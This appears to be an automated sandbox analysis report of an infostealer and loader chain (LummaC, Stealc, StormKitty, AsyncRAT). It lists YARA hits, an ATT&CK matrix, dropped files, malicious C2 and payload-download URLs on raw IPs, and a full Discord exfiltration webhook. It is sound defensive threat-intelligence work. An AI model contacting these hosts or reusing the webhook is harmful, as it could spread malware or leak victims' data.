Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: ae44c30d83.exe PID: 5016, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 75f24a4b40.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 75f24a4b40.exe PID: 5036, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000001B.00000002.3084330655.0000000000751000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2993639198.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3089860517.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9e4b3ff3c2.exe PID: 408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002AEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		6_2_002AEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002ADF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		6_2_002ADF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	311 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 Windows Service	2 Bypass User Account Control	111 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	21 Scheduled Task/Job	1 Windows Service	25 Obfuscated Files or Information	Security Account Manager	11 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	212 Process Injection	22 Software Packing	NTDS	346 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	Network Logon Script	21 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1181 Security Software Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	3 PowerShell	RC Scripts	11 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	481 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	481 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	45%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	37%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	39%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	29%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H3tyh96[1].exe	32%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	42%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	32%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	37%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	45%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	29%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe	42%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1013680001\f2da6a22b2.exe	39%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\ClientAny.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRAT

Source	Detection	Scanner	Label
https://atten-supporse.biz/apid:	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api1z	100%	Avira URL Cloud	malware
https://api.mylnikov	0%	Avira URL Cloud	safe
https://atten-supporse.biz/J	100%	Avira URL Cloud	malware
https://atten-supporse.biz/Jx%z	100%	Avira URL Cloud	malware
http://31.41.244.11/files/1521297942/H3tyh96.exeJ	0%	Avira URL Cloud	safe
http://31.41.244.11/files/1521297942/H3tyh96.exe	100%	Avira URL Cloud	malware
http://31.41.244.11/files/unique2/random.exe6j	0%	Avira URL Cloud	safe
https://atten-supporse.biz/api#z	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api5J	100%	Avira URL Cloud	malware
http://185.215.113.16/well/random.exe_	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php%q%	100%	Avira URL Cloud	malware
http://185.215.113.16/luma/random.exe~	100%	Avira URL Cloud	malware
http://31.41.244.11/files/1521297942/H3tyh96.exeXYZ0123456789	0%	Avira URL Cloud	safe
http://31.41.244.11/files/1521297942/H3tyh96.exeq	0%	Avira URL Cloud	safe
https://atten-supporse.biz/api2gJ	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpta	100%	Avira URL Cloud	malware
http://crl.microO	0%	Avira URL Cloud	safe
https://atten-supporse.biz/P0	100%	Avira URL Cloud	malware
https://atten-supporse.biz/apiyzf	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api?	100%	Avira URL Cloud	malware
http://crl.microZ	0%	Avira URL Cloud	safe
https://atten-supporse.biz/apiXv	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
services.addons.mozilla.org	151.101.1.91	true	false	high
discord.com	162.159.128.233	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
ipv4only.arpa	192.0.0.170	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
ip-api.com	208.95.112.1	true	false	high
normandy-cdn.services.mozilla.com	35.201.103.21	true	false	high
icanhazip.com	104.16.185.241	true	false	high
star-mini.c10r.facebook.com	157.240.195.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.193	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
youtube.com	142.250.181.78	true	false	high
atten-supporse.biz	104.21.32.1	true	false	high
youtube-ui.l.google.com	172.217.17.78	true	false	high
reddit.map.fastly.net	151.101.193.140	true	false	high
api.mylnikov.org	172.67.196.114	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
246.229.1.0.in-addr.arpa	unknown	unknown	false	unknown
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
normandy.cdn.mozilla.net	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
dare-curbys.biz	false	high
http://185.215.113.206/	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
formy-spill.biz	false	high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	high
https://atten-supporse.biz/api	false	high
atten-supporse.biz	false	high
print-vexer.biz	false	high
impend-differ.biz	false	high
http://icanhazip.com/	false	high
dwell-exclaim.biz	false	high
zinc-sneark.biz	false	high
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true	false	high
se-blurry.biz	false	high
covery-mover.biz	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apid:	75f24a4b40.exe, 00000008.00000003.3078427746.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3083855419.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000013.00000002.3091300131.0000000006EA4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/J	75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://discord.com	H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php0001	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000011.00000002.3074244910.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3071186867.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3125496690.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3174623487.00000000044B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api1z	75f24a4b40.exe, 00000008.00000002.3284823099.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.3089463536.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3084016917.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3173110956.0000000006207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org	H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov	H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	H3tyh96.exe, 00000007.00000002.3359474514.00000000052CB000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apin	75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	H3tyh96.exe, 00000007.00000002.3359474514.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3074244910.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3071186867.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3125496690.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3174623487.00000000044B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apii	75f24a4b40.exe, 00000030.00000002.3299078255.000000000073C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/1521297942/H3tyh96.exeJ	skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://discord.com	H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exe	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000028.00000002.3174623487.0000000004605000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/Jx%z	75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000028.00000002.3174623487.0000000004605000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php/	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.raw.7.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000028.00000002.3174623487.0000000004605000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/unique2/random.exe6j	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn	H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/1521297942/H3tyh96.exe	skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3317744980.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/api5J	75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz:443/apiicrosoft	75f24a4b40.exe, 00000030.00000002.3299078255.00000000006C5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	places.raw.7.dr	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpK	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_see	H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpN	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	75f24a4b40.exe, 00000008.00000003.3240100682.0000000001413000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3284706233.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2956826525.0000000001490000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2954139426.000000000148E000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3240829939.0000000001413000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3281595071.0000000001413000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3239056800.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3144279007.0000000005C46000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.mylnikov.org	H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api#z	75f24a4b40.exe, 00000008.00000003.3239262560.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/well/random.exe_	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/files/unique2/random.exe	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpU	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpZ	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exe~	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpf	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpj	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php%q%	skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/files/1521297942/H3tyh96.exeXYZ0123456789	skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://31.41.244.11/files/1521297942/H3tyh96.exeq	skotes.exe, 00000006.00000002.3317744980.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/luma/random.exe	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpta	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	false		high
